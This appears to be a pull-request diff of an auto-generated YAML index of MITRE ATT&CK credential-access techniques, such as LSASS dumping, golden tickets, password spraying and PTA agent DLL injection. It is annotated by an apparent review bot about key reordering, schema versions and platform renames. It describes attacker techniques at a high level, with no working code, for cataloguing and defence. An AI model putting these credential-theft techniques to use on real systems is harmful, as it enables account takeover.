a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
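Review bot: the new T1557.004 object ends at L192245 with `atomic_tests: []` straight after `x_mitre_modified_by_ref`, and the `identifier: T1552` line that used to sit there (L192244) is moved up to L192161; no `identifier: T1557.004` is emitted, the same gap as T1558.005 at L191939, while T1552 (L192161), T1555 (L192117) and T1555.003 (L192457) all get one. On the Entra ID rename in T1556.007 (L192259–L192280), the `(Citation: Azure AD Hybrid Identity)` key at L192261 and the `AzureADConnectAuthenticationAgentService` process name at L192278 are correctly left untouched, since the first must match a `source_name` in the reference list and the second is the real service name; the remaining `Azure AD` occurrences at L192281–L192282 and L192293 are likewise inside `(Citation: …)` keys, so they are correct as-is and a blind search-and-replace would have broken them.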
@@ -45249,9 +46019,9 @@ credential-access:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -45260,21 +46030,22 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -45314,55 +46085,10 @@ credential-access:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ryan Benson, Exabeam
- - Barry Shteiman, Exabeam
- - Sylvain Gil, Exabeam
- - RedHuntLabs, @redhuntlabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
- type: attack-pattern
- created: '2020-02-12T18:57:36.041Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1555.003
- url: https://attack.mitre.org/techniques/T1555/003
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Microsoft CryptUnprotectData April 2018
- url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
- description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
- June 18, 2019.
- - source_name: Proofpoint Vega Credential Stealer May 2018
- url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
- description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
- in targeted campaign . Retrieved June 18, 2019.
- - source_name: FireEye HawkEye Malware July 2017
- url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
- description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
- Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
- 2019.
- - source_name: GitHub Mimikittenz July 2016
- url: https://github.com/putterpanda/mimikittenz
- description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
- Retrieved June 20, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-15T14:13:45.294Z'
name: 'Credentials from Password Stores: Credentials from Web Browsers'
description: "Adversaries may acquire credentials from web browsers by reading
files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
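Review bot: nothing removed in this hunk is actually lost; the platforms, contributors, `id`/`created`/`created_by_ref`, and all five references (Talos, Microsoft CryptUnprotectData, Proofpoint, FireEye, Mimikittenz) are re-emitted further down in T1555.003 at L192390–L192456 in a different key order. The substantive changes to this technique are therefore only the `modified` date (L192382), the `x_mitre_version` bump 1.1 to 1.2 (L192407, L192413), the removed `x_mitre_permissions_required` (L192419–L192420), the dropped `spec_version` (L192421) and the new `revoked: false` (L192427); a reviewer can compare those lines and skip the rest of the reorder.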
@@ -45392,6 +46118,12 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ryan Benson, Exabeam
+ - Barry Shteiman, Exabeam
+ - Sylvain Gil, Exabeam
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Identify web browser files that contain credentials such
as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User
Data\Default\Login Data
. Monitor file read events of web browser files
@@ -45401,23 +46133,58 @@ credential-access:
reading web browser process memory, utilizing regular expressions, and those
that contain numerous keywords for common web applications (Gmail, Twitter,
Office365, etc.).'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Access'
- 'File: File Access'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+ created: '2020-02-12T18:57:36.041Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/003
+ external_id: T1555.003
+ - source_name: GitHub Mimikittenz July 2016
+ description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+ Retrieved June 20, 2019.
+ url: https://github.com/putterpanda/mimikittenz
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Microsoft CryptUnprotectData April 2018
+ description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+ June 18, 2019.
+ url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+ - source_name: Proofpoint Vega Credential Stealer May 2018
+ description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+ in targeted campaign . Retrieved June 18, 2019.
+ url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+ - source_name: FireEye HawkEye Malware July 2017
+ description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+ Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+ 2019.
+ url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1555.003
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -45454,23 +46221,23 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
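Review bot: pure key reordering in T1557.003 (x_mitre_contributors, x_mitre_deprecated and x_mitre_domains move from below x_mitre_platforms to above x_mitre_detection, with no value changing) adds noise that hides the substantive edits elsewhere in this sync. Have the generator serialize keys in a fixed order (sorted, or the upstream bundle's order pinned once) so future regenerations only show lines whose values actually changed.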
@@ -45503,21 +46270,20 @@ credential-access:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.004:
technique:
- modified: '2023-04-12T23:52:08.194Z'
+ modified: '2024-10-04T11:31:56.622Z'
name: 'Unsecured Credentials: Private Keys'
description: "Adversaries may search for private key certificate files on compromised
systems for insecurely stored credentials. Private cryptographic keys and
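Review bot: `spec_version: '2.1'` is dropped here (and from each technique across this diff) while `x_mitre_attack_spec_version` jumps from 2.1.0 to 3.2.0; since `spec_version` is a required property on STIX 2.1 objects, its disappearance together with the version bump suggests the technique data is now being pulled from a different STIX bundle than the previous sync used. The PR description should name the source bundle and ATT&CK version so reviewers can verify the regenerated fields, and confirm nothing downstream validates these entries as STIX 2.1. Moving the lockstepgroup citation to a web.archive.org snapshot is a good change.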
@@ -45528,7 +46294,7 @@ credential-access:
as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. Adversary tools may also search compromised systems for file extensions
relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
- Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+ Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
device key and a transport key are generated and used to verify the device’s
identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45562,7 +46328,7 @@ credential-access:
- macOS
- Windows
- Network
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
@@ -45590,7 +46356,7 @@ credential-access:
- source_name: Kaspersky Careto
description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
Masked APT. Retrieved July 5, 2017.
- url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+ url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
- source_name: Microsoft Primary Refresh Token
description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
Retrieved February 21, 2023.
@@ -45601,14 +46367,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Public-key_cryptography
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.004
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
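Review bot: the `modified` timestamp for T1557.001 moves backwards, from 2023-04-25T14:00:00.188Z to 2022-10-25T15:46:55.393Z, while its x_mitre_attack_spec_version stays at 3.0.0; a regeneration that rolls a timestamp back usually means the source bundle differs from the one used last time. The same pattern recurs on T1558.001 (2022-04-25 back to 2020-11-05) and T1556.008 (2023-10-31 back to 2023-05-04), and in every case the old value carries the 14:00:00.188Z batch stamp. Confirm the new source is the intended one before merging, otherwise the next sync will flip these timestamps forward again.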
@@ -45716,12 +46481,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1003.001:
technique:
- modified: '2023-12-27T17:57:20.003Z'
+ modified: '2024-08-13T13:52:45.379Z'
name: 'OS Credential Dumping: LSASS Memory'
description: |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45758,6 +46522,7 @@ credential-access:
- Edward Millington
- Ed Williams, Trustwave, SpiderLabs
- Olaf Hartong, Falcon Force
+ - Michael Forret, Quorum Cyber
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45770,7 +46535,7 @@ credential-access:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Access'
- 'Windows Registry: Windows Registry Key Modification'
@@ -45820,12 +46585,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.001
atomic_tests: []
T1110.003:
technique:
- modified: '2024-03-07T14:33:34.201Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Spraying'
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -45851,6 +46615,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- John Strand
@@ -45866,18 +46631,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
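Review bot: the platform list for T1110.003 drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider` (version 1.5 to 1.6), and the same consolidation is applied further down to T1649, T1528, T1606, T1621, T1552.008, T1212 and T1110. Any per-platform index that is still keyed on the old platform names will silently lose these techniques, so regenerate every derived index in the same PR and check that the generators filter on the consolidated names rather than the retired ones.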
@@ -45904,14 +46669,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.003
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -45922,13 +46684,13 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -45942,6 +46704,7 @@ credential-access:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -45952,12 +46715,12 @@ credential-access:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1003.005:
technique:
- modified: '2024-04-18T23:47:54.553Z'
+ modified: '2024-10-15T14:18:59.123Z'
name: 'OS Credential Dumping: Cached Domain Credentials'
description: "Adversaries may attempt to access cached domain credentials used
to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -46032,7 +46795,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.005
atomic_tests: []
T1558.001:
@@ -46078,7 +46840,7 @@ credential-access:
url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
Retrieved February 27, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-05T16:07:03.779Z'
name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
description: "Adversaries who have the KRBTGT account password hash may forge
Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -46113,16 +46875,14 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.001
atomic_tests: []
T1649:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal or Forge Authentication Certificates
description: |-
- Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+ Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
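Review bot: T1558.001 loses `x_mitre_attack_spec_version` entirely (2.1.0 is removed and, unlike every other technique in this diff, nothing replaces it) and keeps `x_mitre_permissions_required: [User]`, a field the same patch strips from T1552.003 and T1552.006; together with its `modified` rolling back to 2020-11-05 in the preceding hunk, this entry looks regenerated from a stale copy of the object. Check the source bundle for this technique, or the index will carry one object on an older schema than the rest.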
@@ -46132,21 +46892,23 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Tristan Bennett, Seamless Intelligence
+ - Lee Christensen, SpecterOps
+ - Thirumalai Natarajan, Mandiant
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- - Azure AD
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Tristan Bennett, Seamless Intelligence
- - Lee Christensen, SpecterOps
- - Thirumalai Natarajan, Mandiant
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -46195,33 +46957,11 @@ credential-access:
url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1649
atomic_tests: []
T1552.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
- type: attack-pattern
- created: '2020-02-04T13:02:11.685Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.003
- url: https://attack.mitre.org/techniques/T1552/003
- - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- source_name: External to DA, the OS X Way
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:24:04.912Z'
name: 'Unsecured Credentials: Bash History'
description: 'Adversaries may search the bash command history on compromised
systems for insecurely stored credentials. Bash keeps track of the commands
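Review bot: the whole id/external_references/platform block for T1552.003 is deleted at the top of the object and re-emitted lower down in a different key order, so the only substantive changes (the slideshare URL moving from http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way to the new https slideshow path, the retrieved date, and the 1.1 to 1.2 version bump) are buried in what reads as a wholesale rewrite. Pin the key order in the generator so a citation URL change shows as a two-line diff.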
@@ -46236,25 +46976,43 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Monitoring when the user's .bash_history
is
read can help alert to suspicious activity. While users do typically rely
on their history of commands, they often access this history through other
utilities like "history" instead of commands like cat ~/.bash_history
.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+ created: '2020-02-04T13:02:11.685Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/003
+ external_id: T1552.003
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.003
atomic_tests: []
T1552.001:
technique:
- modified: '2024-04-15T21:33:00.213Z'
+ modified: '2024-10-15T14:28:43.639Z'
name: 'Unsecured Credentials: Credentials In Files'
description: |-
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
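Review bot: the unchanged x_mitre_detection text for T1552.003 carries stray line breaks that leave `is` and `.` on lines of their own (`.bash_history` / `is` / `read can help ...` and `cat ~/.bash_history` / `.`), which looks like residue of stripped inline-code markup in the upstream description rather than intentional YAML folding. Not introduced by this sync, but since the generator is being touched anyway, have it normalize whitespace in folded strings so the detection guidance renders as one sentence. The slideshare citation update (https, new slideshow path, retrieved September 12, 2024) and the 1.1 to 1.2 version bump are the real changes here and look right.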
@@ -46328,7 +47086,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.001
atomic_tests: []
T1606.001:
@@ -46390,11 +47147,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1528:
technique:
- modified: '2024-03-24T19:41:54.832Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Application Access Token
description: "Adversaries can steal application access tokens as a means of
acquiring credentials to access remote systems and resources.\n\nApplication
@@ -46443,6 +47199,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Shailesh Tiwary (Indian Army)
@@ -46451,6 +47208,7 @@ credential-access:
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
